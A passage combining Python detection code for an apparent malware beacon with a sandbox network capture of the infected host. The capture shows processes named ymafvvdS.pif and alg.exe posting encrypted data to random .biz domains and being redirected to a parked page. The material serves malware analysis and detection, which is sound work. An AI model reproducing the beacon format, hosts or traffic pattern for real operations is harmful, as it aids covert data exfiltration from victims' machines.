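def parse_http(raw: bytes):
    """Split a raw HTTP message into (start line, lowercase header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        key = name.strip().lower()
        # repeated headers (the two Set-Cookie lines) are concatenated for matching
        headers[key] = (headers.get(key, "") + " " + value.strip()).strip()
    return lines[0], headers, body


def score(ex: HttpExchange) -> list:
    """Return the beacon indicators one request/response pair matches."""
    start, req_h, req_body = parse_http(ex.request)
    status, resp_h, resp_body = parse_http(ex.response)
    method, path = start.split(" ")[:2]
    host = req_h.get("host", "")
    hits = []
    if host in IPCHECK_HOSTS:
        hits.append("external IP lookup via " + host)
    if req_h.get("user-agent") == BEACON_UA:
        hits.append("static MicroMessenger/QQBrowser User-Agent")
    if method == "POST" and host.endswith(".biz") and RANDOM_PATH.match(path):
        hits.append("POST to .biz host with short random lowercase path")
    # Bytes 8..11 of every POST body shown on this page are a little-endian uint32 equal to
    # Content-Length - 12 (802 -> 0x316, 778 -> 0x2fe); treated here as a heuristic only.
    if len(req_body) >= 12 and int.from_bytes(req_body[8:12], "little") == len(req_body) - 12:
        hits.append("body[8:12] little-endian length matches trailing payload")
    if (status.startswith("HTTP/1.1 200") and resp_h.get("transfer-encoding") == "chunked"
            and resp_body == b"0\r\n\r\n" and "btst=" in resp_h.get("set-cookie", "")):
        hits.append("empty chunked 200 with btst/snkz tracking cookies")
    image = ex.process.lower()
    if image.startswith("c:\\users\\public\\") or image.endswith((".pif", "\\alg.exe")):
        hits.append("HTTP from unexpected process " + ex.process)
    return hits


def is_beacon(ex: HttpExchange, threshold: int = 3) -> bool:
    return len(score(ex)) >= threshold


def suspicious_processes(exchanges) -> list:
    """Flag an image that looks up its public IP and then beacons, or that beacons twice."""
    per_proc = {}
    for ex in exchanges:
        st = per_proc.setdefault(ex.process, {"ipcheck": False, "beacons": 0})
        hits = score(ex)
        st["ipcheck"] |= any(h.startswith("external IP lookup") for h in hits)
        st["beacons"] += 1 if len(hits) >= 3 else 0
    return sorted(p for p, st in per_proc.items()
                  if (st["ipcheck"] and st["beacons"]) or st["beacons"] >= 2)


# Constructed sample data modelled on the sessions above (not a pcap).
PIF = "C:\\Users\\Public\\Libraries\\ymafvvdS.pif"
ALG = "C:\\Windows\\System32\\alg.exe"


def beacon(process, host, path, length):
    body = b"\x02\x82\xadY@u\x07\xf1" + (length - 12).to_bytes(4, "little") + b"\x00" * (length - 12)
    req = (f"POST {path} HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
           f"Pragma: no-cache\r\nHost: {host}\r\nUser-Agent: {BEACON_UA}\r\n"
           f"Content-Length: {length}\r\n\r\n").encode() + body
    resp = ("HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html\r\n"
            "Transfer-Encoding: chunked\r\nConnection: close\r\n"
            "Set-Cookie: btst=f435a1d2f0e2efd83fa870afa4fc631b|8.46.123.228|1733810738|"
            f"1733810738|0|1|0; path=/; domain=.{host}; HttpOnly; SameSite=Lax;\r\n"
            "Set-Cookie: snkz=8.46.123.228; path=/\r\n\r\n0\r\n\r\n").encode()
    return HttpExchange(process, req, resp)


SAMPLE_EXCHANGES = {
    "ipcheck": HttpExchange(PIF,
        b"GET / HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; "
        b".NET CLR1.0.3705;)\r\nHost: checkip.dyndns.org\r\n\r\n",
        b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 104\r\n\r\n"
        b"<html><head><title>Current IP Check</title></head><body>Current IP Address: "
        b"8.46.123.228</body></html>\r\n"),
    "beacon_pif": beacon(PIF, "ssbzmoy.biz", "/jae", 802),
    "beacon_alg_1": beacon(ALG, "pywolwnvd.biz", "/kka", 778),
    "beacon_alg_2": beacon(ALG, "ssbzmoy.biz", "/fupmvmgjbhmts", 778),
    "benign": HttpExchange(  # constructed control: ordinary browser traffic
        "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
        b"GET / HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
        b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello"),
}
```

The per-process pass matters because alg.exe never performs the IP lookup itself but beacons in several sessions, so an exchange-level score alone would leave the correlation to the analyst. The User-Agent string and the .biz hosts are the indicators most likely to change between builds; the structural checks (random lowercase path, empty chunked 200 with btst/snkz cookies, length prefix at offset 8) are more durable, but every rule here is derived from this single capture and should be validated against more samples before deployment.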


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.9 | 49720 | 54.244.188.177 | 80 | 7276 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:43.213071108 CET | 351 | OUT | POST /npdqgsoqmq HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: cvgrf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Dec 10, 2024 07:05:43.213103056 CET | 778 | OUT | Data Raw: 4f 98 9e 56 80 01 b3 69 fe 02 00 00 9e 7c 63 36 ed c0 fe 6d ee b1 89 5e f1 20 f1 d4 9d 7d c4 ae 82 09 37 8a 6d 46 ad 44 76 74 34 70 c3 3f 67 ce c8 13 9d bd 7f 6e ad 13 65 7c ce 29 69 4f ef 1b e9 78 62 fc 40 54 89 ec ee 38 c5 bc 46 80 4b ba 68 e3
    Data Ascii: OVi|c6m^ }7mFDvt4p?gne|)iOxb@T8FKhG&&f/w']`!\d'eswRo69T=9)q%n?(B1[dd47xl<.X&#(d/l`[J.o }H?&LV5VC
Dec 10, 2024 07:05:44.555583954 CET | 409 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 10 Dec 2024 06:05:44 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=44889ad4660603b1fdacd52293a7486b|8.46.123.228|1733810744|1733810744|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49721 | 172.234.222.143 | 80 | 7996 | C:\Users\Public\Libraries\ymafvvdS.pif
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:43.380510092 CET | 353 | OUT | POST /obujsmdylt HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 802
Dec 10, 2024 07:05:43.380527020 CET | 802 | OUT | Data Raw: ed 5c 2a 22 05 28 c7 82 16 03 00 00 c1 dc 74 8a 94 61 04 e2 4a b5 e5 2e 90 7e 43 af e8 1a 32 76 51 65 9d 52 ad 0e 7f 18 de 43 82 d2 28 ab cf fa 18 13 3b aa 16 3c 5f 29 19 5d 95 cf 6d 7f c4 25 53 03 7c e0 e2 fb 09 98 e7 7e 5f cf 67 cc 6e 1a 63 da
    Data Ascii: \*"(taJ.~C2vQeRC(;<_)]m%S|~_gncJdXR4C$~}~.|W?2N"f6b&!|-^'Qa(1{FgxJ66OWYeq]v*7llhHVt#g5CbURWqY
Dec 10, 2024 07:05:44.509558916 CET | 472 | IN | HTTP/1.1 302 Moved Temporarily
    Server: openresty
    Date: Tue, 10 Dec 2024 06:05:44 GMT
    Content-Type: text/html
    Content-Length: 142
    Connection: keep-alive
    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
    Location: http://ww99.przvgke.biz/obujsmdylt
    Cache-Control: no-store, max-age=0
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49722 | 72.52.179.174 | 80 | 7996 | C:\Users\Public\Libraries\ymafvvdS.pif
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:44.864082098 CET | 336 | OUT | GET /obujsmdylt HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Host: ww99.przvgke.biz


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 49723 | 44.221.84.105 | 80 | 7276 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:44.879489899 CET | 354 | OUT | POST /cbecuogqej HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: npukfztj.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Dec 10, 2024 07:05:44.879518032 CET | 778 | OUT | Data Raw: ba c1 d8 c5 57 c5 7f f4 fe 02 00 00 3b bc d1 79 10 a9 af ad b2 28 a8 4d e8 e1 a1 89 fb 2a b4 8b 3d 9d db a8 6c 3e 9b d6 2d 88 3d ef 9f 59 75 9e 59 de 36 32 f3 5c 89 a0 0b d2 17 72 3d ee 04 e1 63 91 95 01 c7 78 46 5a c1 ce 1f 8b 44 48 dc 00 88 9b
    Data Ascii: W;y(M*=l>-=YuY62\r=cxFZDHu# _LF$mG%:j)Qr"j-c2Tz@viWC,97l/)W_&mLTS_4MPKV*D!l*IDU %w3+{Y|$_
Dec 10, 2024 07:05:45.976599932 CET | 412 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 10 Dec 2024 06:05:45 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=46869c4ec47ae458ccca9a792d8d7594|8.46.123.228|1733810745|1733810745|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49724 | 172.234.222.143 | 80 | 7276 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:46.371730089 CET | 348 | OUT | POST /bjede HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Dec 10, 2024 07:05:46.371751070 CET | 778 | OUT | Data Raw: 5c e0 99 93 66 1a 2c 5a fe 02 00 00 b7 6c 35 38 46 bf a4 74 6c c0 95 03 2e 6f 91 55 eb 4e a0 10 1f 13 fa 70 76 3b 1a 28 11 a1 76 0a 7f 69 55 d9 7c 71 d4 c8 6e df 13 6f d9 91 c1 25 d2 0b 8c 3c 10 de f5 07 2b 02 35 32 b0 da 72 fe 61 f1 20 73 22 7a
    Data Ascii: \f,Zl58Ftl.oUNpv;(viU|qno%<+52ra s"zS/3eaX8Jep$z#4#3YWp3jhvwMt~5[D=342S-Oh'zr&*B8x!%s_VX?2H#rKyI6L=dh!
Dec 10, 2024 07:05:47.499865055 CET | 467 | IN | HTTP/1.1 302 Moved Temporarily
    Server: openresty
    Date: Tue, 10 Dec 2024 06:05:47 GMT
    Content-Type: text/html
    Content-Length: 142
    Connection: keep-alive
    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
    Location: http://ww99.przvgke.biz/bjede
    Cache-Control: no-store, max-age=0
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Dec 10, 2024 07:05:54.493613958 CET | 349 | OUT | POST /fauopp HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Dec 10, 2024 07:05:54.493673086 CET | 778 | OUT | Data Raw: 99 11 6f 75 ac 1b c5 58 fe 02 00 00 06 2d 8e 99 43 1b 53 4c 2e 78 a4 17 21 0a 07 88 f4 1c e4 98 bc d6 ed ed ae f8 ea b3 25 e1 1b 23 4a 04 82 29 b0 bc bd f7 7e 57 49 cf f8 c0 8c a0 ef 6b e5 3a 61 ab 25 78 38 d7 7d 58 5c ca 0e 48 78 07 92 d9 5e 33
    Data Ascii: ouX-CSL.x!%#J)~WIk:a%x8}X\Hx^3\(xPMHw^pKq0{D.+qD(5"$Bh?+g@{u~fi[U:I=~?:$WE2zf&[1C|U}Jl0?Klr4
Dec 10, 2024 07:05:54.833575964 CET | 468 | IN | HTTP/1.1 302 Moved Temporarily
    Server: openresty
    Date: Tue, 10 Dec 2024 06:05:54 GMT
    Content-Type: text/html
    Content-Length: 142
    Connection: keep-alive
    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
    Location: http://ww99.przvgke.biz/fauopp
    Cache-Control: no-store, max-age=0
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


Session ID: 12 | Source IP: 192.168.2.9 | Source Port: 49726 | Destination IP: 172.234.222.143 | Destination Port: 80 | PID: 7996 | Process: C:\Users\Public\Libraries\ymafvvdS.pif

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:46.727335930 CET | 349 | OUT | POST /cairvr HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 802
Dec 10, 2024 07:05:46.727360010 CET | 802 | OUT | Data Raw: 25 87 ee c0 23 a0 aa be 16 03 00 00 e4 05 da b5 cd 31 53 16 e3 dc b4 54 7f aa d0 6f 43 d8 15 2b 74 c7 11 51 4b 45 c3 0b dd 13 15 00 14 10 50 00 eb c6 0b cd 45 fc af 89 ac 71 b6 05 5b 3a 2d 90 2f 5a 3d b7 97 82 d8 15 e9 45 ab ce 62 79 d4 ee f9 19
    Data Ascii: %#1SToC+tQKEPEq[:-/Z=Eby&;s(d^3FFzdrN2\OiGnMC;p*6IKRfWaSGq\1;6(*eN4Z6I|2+)g6kM}s_/Fy{sI9
Dec 10, 2024 07:05:47.828200102 CET | 468 | IN | HTTP/1.1 302 Moved Temporarily
    Server: openresty
    Date: Tue, 10 Dec 2024 06:05:47 GMT
    Content-Type: text/html
    Content-Length: 142
    Connection: keep-alive
    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
    Location: http://ww99.przvgke.biz/cairvr
    Cache-Control: no-store, max-age=0
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


Session ID: 13 | Source IP: 192.168.2.9 | Source Port: 49727 | Destination IP: 72.52.179.174 | Destination Port: 80 | PID: 7276 | Process: C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:47.627351046 CET | 331 | OUT | GET /bjede HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Host: ww99.przvgke.biz
Dec 10, 2024 07:05:52.307727098 CET | 280 | IN | HTTP/1.1 302 Moved Temporarily
    Date: Tue, 10 Dec 2024 06:05:52 GMT
    Content-Type: text/html
    Content-Length: 0
    Connection: keep-alive
    Location: http://ww12.przvgke.biz/bjede?usid=18&utid=28672493896
    Cache-Control: no-cache
    Pragma: no-cache
    Access-Control-Allow-Origin: *
Dec 10, 2024 07:05:54.846071005 CET | 332 | OUT | GET /fauopp HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Host: ww99.przvgke.biz
Dec 10, 2024 07:05:55.223030090 CET | 281 | IN | HTTP/1.1 302 Moved Temporarily
    Date: Tue, 10 Dec 2024 06:05:55 GMT
    Content-Type: text/html
    Content-Length: 0
    Connection: keep-alive
    Location: http://ww12.przvgke.biz/fauopp?usid=18&utid=28672494417
    Cache-Control: no-cache
    Pragma: no-cache
    Access-Control-Allow-Origin: *


Session ID: 14 | Source IP: 192.168.2.9 | Source Port: 49728 | Destination IP: 72.52.179.174 | Destination Port: 80 | PID: 7996 | Process: C:\Users\Public\Libraries\ymafvvdS.pif

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:47.950114965 CET | 332 | OUT | GET /cairvr HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Host: ww99.przvgke.biz
Dec 10, 2024 07:05:52.316836119 CET | 280 | IN | HTTP/1.1 302 Moved Temporarily
    Date: Tue, 10 Dec 2024 06:05:52 GMT
    Content-Type: text/html
    Content-Length: 0
    Connection: keep-alive
    Location: http://ww7.przvgke.biz/cairvr?usid=18&utid=28672493914
    Cache-Control: no-cache
    Pragma: no-cache
    Access-Control-Allow-Origin: *


Session ID: 15 | Source IP: 192.168.2.9 | Source Port: 49729 | Destination IP: 13.248.148.254 | Destination Port: 80 | PID: 7276 | Process: C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:05:52.839330912 CET | 356 | OUT | GET /bjede?usid=18&utid=28672493896 HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Host: ww12.przvgke.biz
Dec 10, 2024 07:05:54.126724958 CET | 825 | IN | HTTP/1.1 200 OK
    Accept-Ch: viewport-width
    Accept-Ch: dpr
    Accept-Ch: device-memory
    Accept-Ch: rtt
    Accept-Ch: downlink
    Accept-Ch: ect
    Accept-Ch: ua
    Accept-Ch: ua-full-version
    Accept-Ch: ua-platform
    Accept-Ch: ua-platform-version
    Accept-Ch: ua-arch
    Accept-Ch: ua-model
    Accept-Ch: ua-mobile
    Accept-Ch-Lifetime: 30
    Content-Type: text/html; charset=UTF-8
    Date: Tue, 10 Dec 2024 06:05:53 GMT
    Server: Caddy
    Server: nginx
    Vary: Accept-Encoding
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_OvyNzL1fM3mGcXNtT9+uNK6KAFtCa27ji/Dc/AxSFrpeGBgDKuWeOjkwS/NVQfuEOmIOKbrnhef2rm2NBqYzvw==
    X-Domain: przvgke.biz
    X-Pcrew-Blocked-Reason:
    X-Pcrew-Ip-Organization: CenturyLink
    X-Subdomain: ww12
    Transfer-Encoding: chunked
Dec 10, 2024 07:05:54.127228022 CET | 1236 | IN | Data Raw: 33 63 62 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44
    Data Ascii: 3cb9<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_OvyNzL1fM3mGcXNtT9+uNK6KAFtCa27ji/Dc/AxSFrpeGBgDKuWeOjkwS/NVQfuEOmIOK
Dec 10, 2024 07:05:54.127281904 CET | 1236 | IN | Data Raw: 67 69 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f
    Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;-moz-border-radiu
Dec 10, 2024 07:05:54.127295971 CET | 1236 | IN | Data Raw: 3b 0a 7d 0a 0a 2e 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 32 72 65 6d 20 31 72 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 72 65 6d 3b 0a 20 20 20 20
    Data Ascii: ;}.footer { color:#626574; padding:2rem 1rem; font-size:.8rem; margin:0 auto; max-width:440px;}.footer a:link,.footer a:visited { color:#626574;}.sale_link_bold a,.sale_link,.sale_link a { color:#626574
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127424002 CET1236INData Raw: 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 31 37 2c 20 33 38 2c 20 37 37 29 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 0a
                                                                                                                                                                                                                        Data Ascii: tom: 20px; background-color: rgb(17, 38, 77); text-decoration-line: none; font-size: 18px; font-weight: 700; color: #ffffff; text-align: left;}.fallback-arrow { float: right; width: 24px; height: 24px;
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127435923 CET1236INData Raw: 72 69 67 68 74 2e 20 20 41 6c 6c 20 52 69 67 68 74 73 20 52 65 73 65 72 76 65 64 2e 0a 3c 62 72 2f 3e 3c 62 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 76 6f 69 64 28 30 29 3b 22 20 6f 6e 43 6c 69 63 6b 3d 22 77 69 6e
                                                                                                                                                                                                                        Data Ascii: right. All Rights Reserved.<br/><br/><a href="javascript:void(0);" onClick="window.open('/privacy.html', 'privacy-policy', 'width=890,height=330,left=200,top=200,menubar=no,status=yes,toolbar=no').focus()" class="privacy-policy"> Privac
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127461910 CET1236INData Raw: 27 63 6f 6c 6f 72 53 65 61 72 63 68 42 75 74 74 6f 6e 27 3a 20 27 23 30 62 33 32 37 39 27 2c 0a 20 20 20 20 20 20 20 20 27 63 6f 6c 6f 72 53 65 61 72 63 68 42 75 74 74 6f 6e 54 65 78 74 27 3a 20 27 23 66 66 66 27 0a 20 20 20 20 7d 3b 0a 20 20 20
                                                                                                                                                                                                                        Data Ascii: 'colorSearchButton': '#0b3279', 'colorSearchButtonText': '#fff' }; </script><script type="text/javascript">let isAdult=false; let containerNames=[]; let uniqueTrackingID='MTczMzgxMDc1My44NDg6YTcwZWU0OWQ2ZWYzYWF
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127477884 CET1236INData Raw: 73 65 3b 6c 65 74 20 70 61 67 65 4f 70 74 69 6f 6e 73 20 3d 20 7b 27 70 75 62 49 64 27 3a 20 27 64 70 2d 74 65 61 6d 69 6e 74 65 72 6e 65 74 30 31 27 2c 27 72 65 73 75 6c 74 73 50 61 67 65 42 61 73 65 55 72 6c 27 3a 20 27 2f 2f 27 20 2b 20 6c 6f
